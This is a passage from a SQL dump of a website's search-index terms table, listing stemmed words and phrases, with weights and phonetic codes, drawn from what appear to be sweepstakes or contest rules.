was',0,1,1.3333,'E542',1,'en'),(26356,'earthquakes','earthquak',0,0,0.7333,'E632',1,'en'),(26357,'earthquakes terrorism','earthquak terrorism',0,1,1.7,'E6323625',1,'en'),(26358,'earthquakes terrorism weather','earthquak terrorism weather',0,1,1.9667,'E632362536',1,'en'),(26359,'effect','effect',0,0,0.4,'E123',2,'en'),(26360,'effect to','effect to',0,1,1.3,'E123',1,'en'),(26361,'effect to any','effect to any',0,1,1.4333,'E1235',1,'en'),(26362,'effort has','effort has',0,1,1.3333,'E1632',1,'en'),(26363,'effort has been','effort has been',0,1,1.5,'E163215',1,'en'),(26364,'efforts','effort',0,0,0.4667,'E1632',2,'en'),(26365,'efforts to','effort to',0,1,1.3333,'E16323',2,'en'),(26366,'efforts to comply','effort to comply',0,1,1.5667,'E163232514',1,'en'),(26367,'electronic digital','electron digital',0,1,1.6,'E4236523234',1,'en'),(26368,'electronic digital computer','electron digital computer',0,1,1.9,'E423652323425136',1,'en'),(26369,'electronic or','electron or',0,1,1.4333,'E4236526',1,'en'),(26370,'electronic or the','electron or the',0,1,1.5667,'E42365263',1,'en'),(26371,'electronic or world-wide-web','electron or world-wide-web',0,1,1.9333,'E4236526431',1,'en'),(26372,'electronics','electron',0,0,0.7333,'E423652',1,'en'),(26373,'electronics a','electron a',0,1,1.4333,'E423652',1,'en'),(26374,'electronics a software','electron a software',0,1,1.7333,'E423652136',1,'en'),(26375,'eligible','elig',0,0,0.5333,'E4214',1,'en'),(26376,'eligible entries','elig entries',0,1,1.5333,'E42145362',1,'en'),(26377,'eligible entries collected','elig entries collected',0,1,1.8667,'E42145362423',1,'en'),(26378,'eligible entries received','elig entries received',0,1,1.8333,'E421453626213',1,'en'),(26379,'eligible in','elig in',0,1,1.3667,'E42145',1,'en'),(26380,'eligible in order','elig in order',0,1,1.5667,'E42145636',1,'en'),(26381,'eligible to','elig to',0,1,1.3667,'E42143',1,'en'),(26382,'eligible to enter','elig to enter',0,1,1.5667,'E42143536',1,'en'),(26383,'email add','email add',0,1,1.3,'E543',1,'en'),(26384,'email add your','email add your',0,1,1.4667,'E5436',1,'en'),(26385,'email address','email address',0,1,1.4333,'E54362',1,'en'),(26386,'email address and','email address and',0,1,1.5667,'E5436253',1,'en'),(26387,'email address properly','email address properly',0,1,1.7333,'E5436216164',1,'en'),(26388,'emails','email',0,0,0.4,'E542',1,'en'),(26389,'emails by','email by',0,1,1.3,'E5421',1,'en'),(26390,'emails by following','email by following',0,1,1.6333,'E5421452',1,'en'),(26391,'emotional','emot',0,0,0.6,'E5354',1,'en'),(26392,'emotional distress','emot distress',0,1,1.6,'E535432362',1,'en'),(26393,'emotional distress and','emot distress and',0,1,1.7333,'E53543236253',1,'en'),(26394,'employees broker','employe broker',0,1,1.5333,'E51421626',1,'en'),(26395,'employees broker employees','employe broker employees',0,1,1.8667,'E514216265142',1,'en'),(26396,'employees successors','employe successors',0,1,1.6667,'E514262',1,'en'),(26397,'employees successors assigns','employe successors assigns',0,1,1.9333,'E51426252',1,'en'),(26398,'end of','end of',0,1,1.2,'E531',1,'en'),(26399,'end of contract','end of contract',0,1,1.5,'E531253623',1,'en'),(26400,'end of the','end of the',0,1,1.3333,'E5313',1,'en'),(26401,'endorse','endors',0,0,0.4667,'E5362',1,'en'),(26402,'endorse this','endors this',0,1,1.4,'E536232',1,'en'),(26403,'endorse this sweepstakes','endors this sweepstakes',0,1,1.8,'E5362321232',1,'en'),(26404,'enforceability','enforc',0,0,0.9333,'E5162143',1,'en'),(26405,'enforceability of','enforc of',0,1,1.5667,'E51621431',1,'en'),(26406,'enforceability of these','enforc of these',0,1,1.7667,'E5162143132',1,'en'),(26407,'engagement','engag',0,0,0.6667,'E5253',1,'en'),(26408,'engagement in','engag in',0,1,1.4333,'E52535',1,'en'),(26409,'engagement in any','engag in any',0,1,1.5667,'E52535',1,'en'),(26410,'engaging','engag',0,0,0.5333,'E5252',1,'en'),(26411,'engaging in','engag in',0,1,1.3667,'E52525',1,'en'),(26412,'engaging in the','engag in the',0,1,1.5,'E525253',1,'en'),(26413,'enter','enter',0,0,0.3333,'E536',1,'en'),(26414,'enter by','enter by',0,1,1.2667,'E5361',1,'en'),(26415,'enter by making','enter by making',0,1,1.5,'E53615252',1,'en'),(26416,'enter or','enter or',0,1,1.2667,'E536',1,'en'),(26417,'enter or win','enter or win',0,1,1.4,'E5365',1,'en'),(26418,'enter the','enter the',0,1,1.3,'E5363',1,'en'),(26419,'enter the contest','enter the contest',0,1,1.5667,'E536325323',1,'en'),(26420,'enter the contests','enter the contests',0,1,1.6,'E5363253232',1,'en'),(26421,'enter the drawing','enter the drawing',0,1,1.5667,'E5363652',1,'en'),(26422,'enter the sweepstakes','enter the sweepstakes',0,1,1.7,'E536321232',1,'en'),(26423,'enter this','enter this',0,1,1.3333,'E53632',1,'en'),(26424,'enter this sweepstakes','enter this sweepstakes',0,1,1.7333,'E536321232',1,'en'),(26425,'entering','enter',0,0,0.5333,'E53652',1,'en'),(26426,'entering entrants','enter entrants',0,1,1.5667,'E53652536532',1,'en'),(26427,'entering entrants agree','enter entrants agree',0,1,1.7667,'E536525365326',1,'en'),(26428,'entering or','enter or',0,1,1.3667,'E536526',1,'en'),(26429,'entering or attempting','enter or attempting',0,1,1.7333,'E536526351352',1,'en'),(26430,'entering or downloading','enter or downloading',0,1,1.7667,'E536526354352',1,'en'),(26431,'entering or engaging','enter or engaging',0,1,1.6667,'E5365265252',1,'en'),(26432,'entering the','enter the',0,1,1.4,'E536523',1,'en'),(26433,'entering the contest','enter the contest',0,1,1.6667,'E53652325323',1,'en'),(26434,'enters','enter',0,0,0.4,'E5362',1,'en'),(26435,'enters the','enter the',0,1,1.3333,'E53623',1,'en'),(26436,'enters the contests','enter the contests',0,1,1.6333,'E53623253232',1,'en'),(26437,'entire','entir',0,0,0.4,'E536',1,'en'),(26438,'entire sweepstakes','entir sweepstakes',0,1,1.6,'E53621232',1,'en'),(26439,'entire sweepstakes promotion','entir sweepstakes promotion',0,1,1.9333,'E5362123216535',1,'en'),(26440,'entirely','entir',0,0,0.5333,'E5364',1,'en'),(26441,'entirely or','entir or',0,1,1.3667,'E53646',1,'en'),(26442,'entirely or in','entir or in',0,1,1.4667,'E536465',1,'en'),(26443,'entrant','entrant',0,0,0.4667,'E53653',1,'en'),(26444,'entrant especially','entrant especially',0,1,1.6,'E536532124',1,'en'),(26445,'entrant especially but','entrant especially but',0,1,1.7333,'E53653212413',1,'en'),(26446,'entrant or','entrant or',0,1,1.3333,'E536536',1,'en'),(26447,'entrant or sponsor','entrant or sponsor',0,1,1.6,'E53653621526',1,'en'),(26448,'entrant\'s','entrant',0,0,0.6,'E536532',1,'en'),(26449,'entrant\'s e','entrant e',0,1,1.3667,'E536532',1,'en'),(26450,'entrant\'s e mail','entrant e mail',0,1,1.5333,'E53653254',1,'en'),(26451,'entrant\'s sole','entrant sole',0,1,1.4667,'E5365324',1,'en'),(26452,'entrant\'s sole dependability','entrant sole dependability',0,1,1.9333,'E53653243153143',1,'en'),(26453,'entrants','entrant',0,0,0.5333,'E536532',1,'en'),(26454,'entrants agree','entrant agree',0,1,1.4667,'E5365326',1,'en'),(26455,'entrants agree and','entrant agree and',0,1,1.6,'E536532653',1,'en'),(26456,'entrants and','entrant and',0,1,1.4,'E53653253',1,'en'),(26457,'entrants and winner','entrant and winner',0,1,1.6333,'E5365325356',1,'en'),(26458,'entrants and winners','entrant and winners',0,1,1.6667,'E53653253562',1,'en'),(26459,'entrants hereby','entrant hereby',0,1,1.5,'E53653261',1,'en'),(26460,'entrants hereby irrevocably','entrant hereby irrevocably',0,1,1.9,'E5365326161214',1,'en'),(26461,'entrants information','entrant information',0,1,1.6667,'E536532516535',1,'en'),(26462,'entrants information will','entrant information will',0,1,1.8333,'E5365325165354',1,'en'),(26463,'entrants may','entrant may',0,1,1.4,'E5365325',1,'en'),(26464,'entrants may subsequently','entrant may subsequently',0,1,1.8333,'E5365325212534',1,'en'),(26465,'entrants or','entrant or',0,1,1.3667,'E5365326',1,'en'),(26466,'entrants or to','entrant or to',0,1,1.4667,'E53653263',1,'en'),(26467,'entrants who','entrant who',0,1,1.4,'E536532',1,'en'),(26468,'entrants who have','entrant who have',0,1,1.5667,'E5365321',1,'en'),(26469,'entrants will','entrant will',0,1,1.4333,'E5365324',1,'en'),(26470,'entrants will be','entrant will be',0,1,1.5333,'E53653241',1,'en'),(26471,'entrants with','entrant with',0,1,1.4333,'E5365323',1,'en'),(26472,'entrants with respect','entrant with respect',0,1,1.7,'E536532362123',1,'en'),(26473,'entries','entri',0,0,0.4667,'E5362',1,'en'),(26474,'entries appears','entri appears',0,1,1.5,'E5362162',1,'en'),(26475,'entries appears to','entri appears to',0,1,1.6,'E53621623',1,'en'),(26476,'entries are','entri are',0,1,1.3667,'E53626',1,'en'),(26477,'entries are not','entri are not',0,1,1.5,'E5362653',1,'en'),(26478,'entries assets','entri assets',0,1,1.4667,'E536232',1,'en'),(26479,'entries assets images','entri assets images',0,1,1.7,'E53623252',1,'en'),(26480,'entries at','entri at',0,1,1.3333,'E53623',1,'en'),(26481,'entries at issue','entri at issue',0,1,1.5333,'E536232',1,'en'),(26482,'entries become','entri become',0,1,1.4667,'E5362125',1,'en'),(26483,'entries become the','entri become the',0,1,1.6,'E53621253',1,'en'),(26484,'entries by','entri by',0,1,1.3333,'E53621',1,'en'),(26485,'entries by the','entri by the',0,1,1.4667,'E536213',1,'en'),(26486,'entries collected','entri collected',0,1,1.5667,'E5362423',1,'en'),(26487,'entries collected on','entri collected on',0,1,1.6667,'E53624235',1,'en'),(26488,'entries entry','entri entry',0,1,1.4333,'E5362536',1,'en'),(26489,'entries entry materials','entri entry materials',0,1,1.7667,'E536253653642',1,'en'),(26490,'entries entry references','entri entry references',0,1,1.8,'E53625361652',1,'en'),(26491,'entries if','entri if',0,1,1.3333,'E53621',1,'en'),(26492,'entries if sponsor','entri if sponsor',0,1,1.6,'E5362121526',1,'en'),(26493,'entries received','entri received',0,1,1.5333,'E53626213',1,'en'),(26494,'entries received as','entri received as',0,1,1.6333,'E536262132',1,'en'),(26495,'entries received winner','entri received winner',0,1,1.7667,'E5362621356',1,'en'),(26496,'entry an','entri an',0,1,1.2667,'E5365',1,'en'),(26497,'entry an affidavit','entri an affidavit',0,1,1.6,'E53651313',1,'en'),(26498,'entry and entries','entri and entries',0,1,1.5667,'E536535362',1,'en'),(26499,'entry and entry','entri and entry',0,1,1.5,'E53653536',1,'en'),(26500,'entry canadian','entri canadian',0,1,1.4667,'E5362535',1,'en'),(26501,'entry canadian occupants','entri canadian occupants',0,1,1.8,'E536253521532',1,'en'),(26502,'entry cannot','entri cannot',0,1,1.4,'E536253',1,'en'),(26503,'entry cannot contain','entri cannot contain',0,1,1.6667,'E5362532535',1,'en'),(26504,'entry chemicals','entri chemicals',0,1,1.5,'E53625242',1,'en'),(26505,'entry chemicals photos','entri chemicals photos',0,1,1.7333,'E53625242132',1,'en'),(26506,'entry h','entri h',0,1,1.2333,'E536',1,'en'),(26507,'entry h of','entri h of',0,1,1.3333,'E5361',1,'en'),(26508,'entry material','entri material',0,1,1.4667,'E5365364',1,'en'),(26509,'entry material entry','entri material entry',0,1,1.6667,'E5365364536',1,'en'),(26510,'entry material entry.3.random','entri material entry.3.random',0,1,1.9667,'E5365364536535',1,'en'),(26511,'entry materials','entri materials',0,1,1.5,'E53653642',1,'en'),(26512,'entry materials that','entri materials that',0,1,1.6667,'E536536423',1,'en'),(26513,'entry on','entri on',0,1,1.2667,'E5365',1,'en'),(26514,'entry on or','entri on or',0,1,1.3667,'E53656',1,'en'),(26515,'entry per','entri per',0,1,1.3,'E53616',1,'en'),(26516,'entry per particular','entri per particular',0,1,1.6667,'E53616163246',1,'en'),(26517,'entry process','entri process',0,1,1.4333,'E536162',1,'en'),(26518,'entry process or','entri process or',0,1,1.5333,'E5361626',1,'en'),(26519,'entry references','entri references',0,1,1.5333,'E5361652',1,'en'),(26520,'entry references prize','entri references prize',0,1,1.7333,'E5361652162',1,'en'),(26521,'entry.3.random','entry.3.random',0,0,0.9333,'E536535',1,'en'),(26522,'entry.3.random attracting','entry.3.random attracting',0,1,1.8333,'E536535362352',1,'en'),(26523,'entry.3.random attracting odds','entry.3.random attracting odds',0,1,2,'E53653536235232',1,'en'),(26524,'equal','equal',0,0,0.3333,'E240',1,'en'),(26525,'equal or','equal or',0,1,1.2667,'E246',1,'en'),(26526,'equal or greater','equal or greater',0,1,1.5333,'E2462636',1,'en'),(26527,'error','error',0,0,0.3333,'E600',1,'en'),(26528,'error regardless','error regardless',0,1,1.5333,'E626342',1,'en'),(26529,'especially but','especi but',0,1,1.4667,'E212413',1,'en'),(26530,'especially but not','especi but not',0,1,1.6,'E21241353',1,'en'),(26531,'estate','estat',0,0,0.4,'E230',1,'en'),(26532,'estate assets','estat assets',0,1,1.4333,'E23232',1,'en'),(26533,'estate assets damage','estat assets damage',0,1,1.6667,'E23232352',1,'en'),(26534,'et july','et july',0,1,1.2333,'E324',1,'en'),(26535,'et july 2nd','et july 2nd',0,1,1.3667,'E32453',1,'en'),(26536,'europe','europ',0,0,0.4,'E610',1,'en'),(26537,'europe excluding','europ excluding',0,1,1.5333,'E6124352',1,'en'),(26538,'europe excluding citizens','europ excluding citizens',0,1,1.8333,'E61243523252',1,'en'),(26539,'event beyond','event beyond',0,1,1.4,'E153153',1,'en'),(26540,'event beyond sponsor','event beyond sponsor',0,1,1.6667,'E15315321526',1,'en'),(26541,'events','event',0,0,0.4,'E1532',1,'en'),(26542,'events compromise','event compromise',0,1,1.5667,'E153251652',1,'en'),(26543,'events compromise the','event compromise the',0,1,1.7,'E1532516523',1,'en'),(26544,'every purposes','everi purposes',0,1,1.4667,'E161612',1,'en'),(26545,'every purposes contain','everi purposes contain',0,1,1.7333,'E161612535',1,'en'),(26546,'evidence','evid',0,0,0.5333,'E1352',1,'en'),(26547,'evidence any','evid any',0,1,1.4,'E13525',1,'en'),(26548,'evidence any portion','evid any portion',0,1,1.6667,'E135251635',1,'en'),(26549,'example','exampl',0,0,0.4667,'E2514',4,'en'),(26550,'example by','exampl by',0,1,1.3333,'E25141',1,'en'),(26551,'example by full','exampl by full',0,1,1.5,'E251414',1,'en'),(26552,'except','except',0,0,0.4,'E213',1,'en'),(26553,'except the','except the',0,1,1.3333,'E213',1,'en'),(26554,'except the entrant','except the entrant',0,1,1.6,'E21353653',1,'en'),(26555,'except where','except where',0,1,1.4,'E2136',1,'en'),(26556,'except where disallowed','except where disallowed',0,1,1.7667,'E21363243',1,'en'),(26557,'except where prohibited','except where prohibited',0,1,1.7667,'E21361613',1,'en'),(26558,'exception','except',0,0,0.6,'E2135',1,'en'),(26559,'exception that','except that',0,1,1.4667,'E21353',1,'en'),(26560,'exception that sponsor','except that sponsor',0,1,1.7333,'E2135321526',1,'en'),(26561,'excluding','exclud',0,0,0.6,'E24352',1,'en'),(26562,'excluding citizens','exclud citizens',0,1,1.6,'E243523252',1,'en'),(26563,'excluding citizens of','exclud citizens of',0,1,1.7,'E2435232521',1,'en'),(26564,'executed winners','execut winners',0,1,1.5333,'E23562',1,'en'),(26565,'executed winners affidavit','execut winners affidavit',0,1,1.8667,'E235621313',1,'en'),(26566,'exerted','exert',0,0,0.4667,'E263',1,'en'),(26567,'exerted based','exert based',0,1,1.4333,'E263123',1,'en'),(26568,'exerted based on','exert based on',0,1,1.5333,'E2631235',1,'en'),(26569,'expense','expens',0,0,0.4667,'E2152',1,'en'),(26570,'expense the','expens the',0,1,1.3667,'E21523',1,'en'),(26571,'expense the least','expens the least',0,1,1.5667,'E21523423',1,'en'),(26572,'expenses','expens',0,0,0.5333,'E2152',2,'en'),(26573,'expenses not','expens not',0,1,1.4,'E215253',1,'en'),(26574,'expenses not specifically','expens not specifically',0,1,1.8333,'E215253212124',1,'en'),(26575,'expenses prize','expens prize',0,1,1.4667,'E2152162',1,'en'),(26576,'expenses prize subject','expens prize subject',0,1,1.7333,'E2152162123',1,'en'),(26577,'express','express',0,0,0.4667,'E2162',1,'en'),(26578,'express company','express company',0,1,1.5,'E2162515',1,'en'),(26579,'express company american','express company american',0,1,1.8,'E2162515625',1,'en'),(26580,'express company is','express company is',0,1,1.6,'E21625152',1,'en'),(26581,'express gift','express gift',0,1,1.4,'E216213',1,'en'),(26582,'express gift cards','express gift cards',0,1,1.6,'E2162132632',1,'en'),(26583,'express gift cardsshould','express gift cardsshould',0,1,1.8,'E216213263243',1,'en'),(26584,'express is','express is',0,1,1.3333,'E2162',1,'en'),(26585,'express is a','express is a',0,1,1.4,'E2162',1,'en'),(26586,'express or','express or',0,1,1.3333,'E21626',1,'en'),(26587,'express or intended','express or intended',0,1,1.6333,'E216265353',1,'en'),(26588,'express reports','express reports',0,1,1.5,'E216261632',1,'en'),(26589,'express reports biographical','express reports biographical',0,1,1.9333,'E216261632126124',1,'en'),(26590,'express warranties','express warranties',0,1,1.6,'E21626532',1,'en'),(26591,'express warranties provided','express warranties provided',0,1,1.9,'E216265321613',1,'en'),(26592,'extent','extent',0,0,0.4,'E2353',1,'en'),(26593,'extent made','extent made',0,1,1.3667,'E235353',1,'en'),(26594,'extent made way','extent made way',0,1,1.5,'E235353',1,'en'),(26595,'f potential','f potential',0,1,1.3667,'F3534',1,'en'),(26596,'f potential winner','f potential winner',0,1,1.6,'F353456',1,'en'),(26597,'facts','fact',0,0,0.3333,'F232',2,'en'),(26598,'facts entirely','fact entirely',0,1,1.4667,'F2325364',1,'en'),(26599,'facts entirely or','fact entirely or',0,1,1.5667,'F23253646',1,'en'),(26600,'fails','fail',0,0,0.3333,'F420',1,'en'),(26601,'fails to','fail to',0,1,1.2667,'F423',1,'en'),(26602,'fails to fulfill','fail to fulfill',0,1,1.5333,'F4231414',1,'en'),(26603,'failures','failur',0,0,0.5333,'F462',1,'en'),(26604,'failures or','failur or',0,1,1.3667,'F4626',1,'en'),(26605,'failures or dilemmas','failur or dilemmas',0,1,1.6667,'F46263452',1,'en'),(26606,'familiar','familiar',0,0,0.5333,'F546',1,'en'),(26607,'familiar any','familiar any',0,1,1.4,'F5465',1,'en'),(26608,'familiar any person','familiar any person',0,1,1.6333,'F54651625',1,'en'),(26609,'families','famili',0,0,0.5333,'F542',2,'en'),(26610,'families youthful','famili youthful',0,1,1.5667,'F542314',1,'en'),(26611,'families youthful young','famili youthful young',0,1,1.7667,'F54231452',1,'en'),(26612,'family and','famili and',0,1,1.3333,'F5453',1,'en'),(26613,'family and family','famili and family',0,1,1.5667,'F5453154',1,'en'),(26614,'family members','famili members',0,1,1.4667,'F545162',1,'en'),(26615,'family members shall','famili members shall',0,1,1.6667,'F5451624',1,'en'),(26616,'family of','famili of',0,1,1.3,'F541',1,'en'),(26617,'family of such','famili of such',0,1,1.4667,'F5412',1,'en'),(26618,'famous people','famou people',0,1,1.4333,'F5214',1,'en'),(26619,'famous people unless','famou people unless',0,1,1.6667,'F5214542',1,'en'),(26620,'federal','feder',0,0,0.4667,'F364',2,'en'),(26621,'federal 1099','feder 1099',0,1,1.4,'F364',1,'en'),(26622,'federal 1099 misc','feder 1099 misc',0,1,1.5667,'F36452',1,'en'),(26623,'federal can','feder can',0,1,1.3667,'F36425',1,'en'),(26624,'federal can law','feder can law',0,1,1.5,'F364254',1,'en'),(26625,'federal court','feder court',0,1,1.4333,'F364263',1,'en'),(26626,'federal court having','feder court having',0,1,1.6667,'F364263152',1,'en'),(26627,'feedback','feedback',0,0,0.5333,'F312',1,'en'),(26628,'feedback provided','feedback provided',0,1,1.5667,'F3121613',1,'en'),(26629,'feedback provided on','feedback provided on',0,1,1.6667,'F31216135',1,'en'),(26630,'fees','fee',0,0,0.2667,'F200',1,'en'),(26631,'fees linked','fee linked',0,1,1.3667,'F24523',1,'en'),(26632,'fees linked to','fee linked to',0,1,1.4667,'F24523',1,'en'),(26633,'final','final',0,0,0.3333,'F540',1,'en'),(26634,'final and','final and',0,1,1.3,'F5453',1,'en'),(26635,'final and binding','final and binding',0,1,1.5667,'F545315352',1,'en'),(26636,'final in','final in',0,1,1.2667,'F545',1,'en'),(26637,'final in all','final in all',0,1,1.4,'F5454',1,'en'),(26638,'finds','find',0,0,0.3333,'F532',1,'en'),(26639,'finds in','find in',0,1,1.2667,'F5325',1,'en'),(26640,'finds in its','find in its',0,1,1.4,'F532532',1,'en'),(26641,'finds to','find to',0,1,1.2667,'F5323',1,'en'),(26642,'finds to be','find to be',0,1,1.3667,'F53231',1,'en'),(26643,'first thoroughly','first thoroughly',0,1,1.5333,'F623624',1,'en'),(26644,'first thoroughly answer','first thoroughly answer',0,1,1.7667,'F623624526',1,'en'),(26645,'five 5','five 5',0,1,1.2,'F000',1,'en'),(26646,'five 5 days','five 5 days',0,1,1.3667,'F320',1,'en'),(26647,'follow','follow',0,0,0.4,'F400',1,'en'),(26648,'follow all','follow all',0,1,1.3333,'F400',1,'en'),(26649,'follow all points','follow all points',0,1,1.5667,'F41532',1,'en'),(26650,'following opt','follow opt',0,1,1.4333,'F45213',1,'en'),(26651,'following opt out','follow opt out',0,1,1.5667,'F45213',1,'en'),(26652,'for administration','for administration',0,1,1.6,'F63523635',1,'en'),(26653,'for administration of','for administration of',0,1,1.7,'F635236351',1,'en'),(26654,'for any claims','for any claims',0,1,1.4667,'F652452',1,'en'),(26655,'for any injury','for any injury',0,1,1.4667,'F6526',1,'en'),(26656,'for any purposes','for any purposes',0,1,1.5333,'F651612',1,'en'),(26657,'for any resulting','for any resulting',0,1,1.5667,'F65624352',1,'en'),(26658,'for any warranty','for any warranty',0,1,1.5333,'F65653',1,'en'),(26659,'for by','for by',0,1,1.2,'F610',1,'en'),(26660,'for by law','for by law',0,1,1.3333,'F614',1,'en'),(26661,'for computer','for computer',0,1,1.4,'F625136',1,'en'),(26662,'for computer r','for computer r',0,1,1.4667,'F625136',1,'en'),(26663,'for every','for every',0,1,1.3,'F616',3,'en'),(26664,'for every purposes','for every purposes',0,1,1.6,'F6161612',1,'en'),(26665,'for illustrative','for illustrative',0,1,1.5333,'F6423631',1,'en'),(26666,'for illustrative usages','for illustrative usages',0,1,1.7667,'F64236312',1,'en'),(26667,'for in','for in',0,1,1.2,'F650',1,'en'),(26668,'for in the','for in the',0,1,1.3333,'F653',1,'en'),(26669,'for lowering','for lowering',0,1,1.4,'F64652',1,'en'),(26670,'for lowering injure','for lowering injure',0,1,1.6333,'F64652526',1,'en'),(26671,'for or','for or',0,1,1.2,'F600',1,'en'),(26672,'for or guidance','for or guidance',0,1,1.5,'F62352',1,'en'),(26673,'for reasons','for reasons',0,1,1.3667,'F6252',2,'en'),(26674,'for reasons unknown','for reasons unknown',0,1,1.6333,'F6252525',2,'en'),(26675,'for sponsor','for sponsor',0,1,1.3667,'F621526',1,'en'),(26676,'for sponsor in','for sponsor in',0,1,1.4667,'F6215265',1,'en'),(26677,'for sponsor or','for sponsor or',0,1,1.4667,'F621526',1,'en'),(26678,'for sponsor to','for sponsor to',0,1,1.4667,'F6215263',1,'en'),(26679,'for the duration','for the duration',0,1,1.5333,'F63635',1,'en'),(26680,'for the replacement','for the replacement',0,1,1.6333,'F63614253',1,'en'),(26681,'for the retail','for the retail',0,1,1.4667,'F63634',1,'en'),(26682,'for you you','for you you',0,1,1.3667,'F600',1,'en'),(26683,'foresight','foresight',0,0,0.6,'F623',1,'en'),(26684,'foresight to','foresight to',0,1,1.4,'F623',1,'en'),(26685,'foresight to replace','foresight to replace',0,1,1.6667,'F6236142',1,'en'),(26686,'forfeited','forfeit',0,0,0.6,'F613',1,'en'),(26687,'forfeited and','forfeit and',0,1,1.4333,'F61353',1,'en'),(26688,'forfeited and won\'t','forfeit and won',0,1,1.6333,'F6135353',1,'en'),(26689,'form completing','form completing',0,1,1.5,'F652514352',1,'en'),(26690,'form completing as','form completing as',0,1,1.6,'F652514352',1,'en'),(26691,'form for the','form for the',0,1,1.4,'F65163',1,'en'),(26692,'forms','form',0,0,0.3333,'F652',1,'en'),(26693,'forms of','form of',0,1,1.2667,'F6521',1,'en'),(26694,'forms of media','form of media',0,1,1.4667,'F652153',1,'en'),(26695,'forms that','form that',0,1,1.3333,'F6523',1,'en'),(26696,'forms that sponsor','form that sponsor',0,1,1.6,'F652321526',1,'en'),(26697,'forum','forum',0,0,0.3333,'F650',1,'en'),(26698,'forum alternative','forum alternative',0,1,1.5667,'F65436531',1,'en'),(26699,'forum alternative clause','forum alternative clause',0,1,1.8,'F65436531242',1,'en'),(26700,'forum non','forum non',0,1,1.3,'F650',1,'en'),(26701,'forum non conveniens','forum non conveniens',0,1,1.6667,'F6525152',1,'en'),(26702,'found','found',0,0,0.3333,'F530',4,'en'),(26703,'found to','found to',0,1,1.2667,'F530',2,'en'),(26704,'found to be','found to be',0,1,1.3667,'F531',1,'en'),(26705,'fourteen','fourteen',0,0,0.5333,'F635',1,'en'),(26706,'fourteen 14','fourteen 14',0,1,1.3667,'F635',1,'en'),(26707,'fourteen 14 days','fourteen 14 days',0,1,1.5333,'F63532',1,'en'),(26708,'fraud','fraud',0,0,0.3333,'F630',1,'en'),(26709,'fraud or','fraud or',0,1,1.2667,'F636',1,'en'),(26710,'fraud or deception','fraud or deception',0,1,1.6,'F63632135',1,'en'),(26711,'from among','from among',0,1,1.3333,'F652',1,'en'),(26712,'from among additional','from among additional',0,1,1.7,'F652354',1,'en'),(26713,'from among all','from among all',0,1,1.4667,'F6524',1,'en'),(26714,'from any','from any',0,1,1.2667,'F650',1,'en'),(26715,'from entering','from entering',0,1,1.4333,'F653652',1,'en'),(26716,'from entering or','from entering or',0,1,1.5333,'F6536526',1,'en'),(26717,'from such','from such',0,1,1.3,'F652',1,'en'),(26718,'from such person','from such person',0,1,1.5333,'F6521625',1,'en'),(26719,'from the date','from the date',0,1,1.4333,'F653',1,'en'),(26720,'from the sweepstakes','from the sweepstakes',0,1,1.6667,'F65321232',1,'en'),(26721,'from utilizing','from utilizing',0,1,1.4667,'F6534252',1,'en'),(26722,'from utilizing this','from utilizing this',0,1,1.6333,'F653425232',1,'en'),(26723,'fulfill','fulfil',0,0,0.4667,'F414',1,'en'),(26724,'fulfill the','fulfil the',0,1,1.3667,'F4143',1,'en'),(26725,'fulfill the affidavit','fulfil the affidavit',0,1,1.7,'F41431313',1,'en'),(26726,'fulfilling','fulfil',0,0,0.6667,'F41452',1,'en'),(26727,'fulfilling using','fulfil using',0,1,1.5333,'F4145252',1,'en'),(26728,'fulfilling using advertising','fulfil using advertising',0,1,1.9333,'F41452523163252',1,'en'),(26729,'full name','full name',0,1,1.3,'F450',1,'en'),(26730,'full name or','full name or',0,1,1.4,'F456',1,'en'),(26731,'full name state','full name state',0,1,1.5,'F4523',1,'en'),(26732,'fully comply','fulli comply',0,1,1.4,'F42514',1,'en'),(26733,'fully comply with','fulli comply with',0,1,1.5667,'F425143',1,'en'),(26734,'further','further',0,0,0.4667,'F636',1,'en'),(26735,'further emails','further emails',0,1,1.4667,'F636542',1,'en'),(26736,'further emails by','further emails by',0,1,1.5667,'F6365421',1,'en'),(26737,'further issue','further issue',0,1,1.4333,'F6362',1,'en'),(26738,'further issue ban','further issue ban',0,1,1.5667,'F636215',1,'en'),(26739,'further stops','further stops',0,1,1.4333,'F6362312',1,'en'),(26740,'further stops ban','further stops ban',0,1,1.5667,'F636231215',1,'en'),(26741,'g entrants','g entrants',0,1,1.3333,'G536532',1,'en'),(26742,'g entrants who','g entrants who',0,1,1.4667,'G536532',1,'en'),(26743,'get back','get back',0,1,1.2667,'G312',1,'en'),(26744,'get back on','get back on',0,1,1.3667,'G3125',1,'en'),(26745,'get back to','get back to',0,1,1.3667,'G3123',1,'en'),(26746,'gift cards','gift cards',0,1,1.3333,'G132632',1,'en'),(26747,'gift cards american','gift cards american',0,1,1.6333,'G1326325625',1,'en'),(26748,'gift cards and','gift cards and',0,1,1.4667,'G13263253',1,'en'),(26749,'gift cards have','gift cards have',0,1,1.5,'G1326321',1,'en'),(26750,'gift cards once','gift cards once',0,1,1.5,'G13263252',1,'en'),(26751,'gift cards we','gift cards we',0,1,1.4333,'G132632',1,'en'),(26752,'gift cardsshould','gift cardsshould',0,1,1.5333,'G13263243',1,'en'),(26753,'gift cardsshould be','gift cardsshould be',0,1,1.6333,'G132632431',1,'en'),(26754,'give off','give off',0,1,1.2667,'G100',1,'en'),(26755,'give off from','give off from',0,1,1.4333,'G165',1,'en'),(26756,'given','given',0,0,0.3333,'G150',2,'en'),(26757,'given to','given to',0,1,1.2667,'G153',1,'en'),(26758,'given to one','given to one',0,1,1.4,'G1535',1,'en'),(26759,'giving','give',0,0,0.4,'G152',1,'en'),(26760,'giving effect','give effect',0,1,1.4333,'G152123',1,'en'),(26761,'giving effect to','give effect to',0,1,1.5333,'G152123',1,'en'),(26762,'god','god',0,0,0.2,'G300',1,'en'),(26763,'god earthquakes','god earthquakes',0,1,1.5,'G3632',1,'en'),(26764,'god earthquakes terrorism','god earthquakes terrorism',0,1,1.8333,'G36323625',1,'en'),(26765,'goods','good',0,0,0.3333,'G320',3,'en'),(26766,'goods or','good or',0,1,1.2667,'G326',1,'en'),(26767,'goods or their','good or their',0,1,1.4667,'G32636',1,'en'),(26768,'governed','govern',0,0,0.5333,'G1653',1,'en'),(26769,'governed by','govern by',0,1,1.3667,'G16531',1,'en'),(26770,'governed by and','govern by and',0,1,1.5,'G1653153',1,'en'),(26771,'greater','greater',0,0,0.4667,'G636',3,'en'),(26772,'greater value','greater value',0,1,1.4333,'G63614',1,'en'),(26773,'greater value or','greater value or',0,1,1.5333,'G636146',1,'en'),(26774,'guardian','guardian',0,0,0.5333,'G635',1,'en'),(26775,'guardian if','guardian if',0,1,1.3667,'G6351',1,'en'),(26776,'guardian if a','guardian if 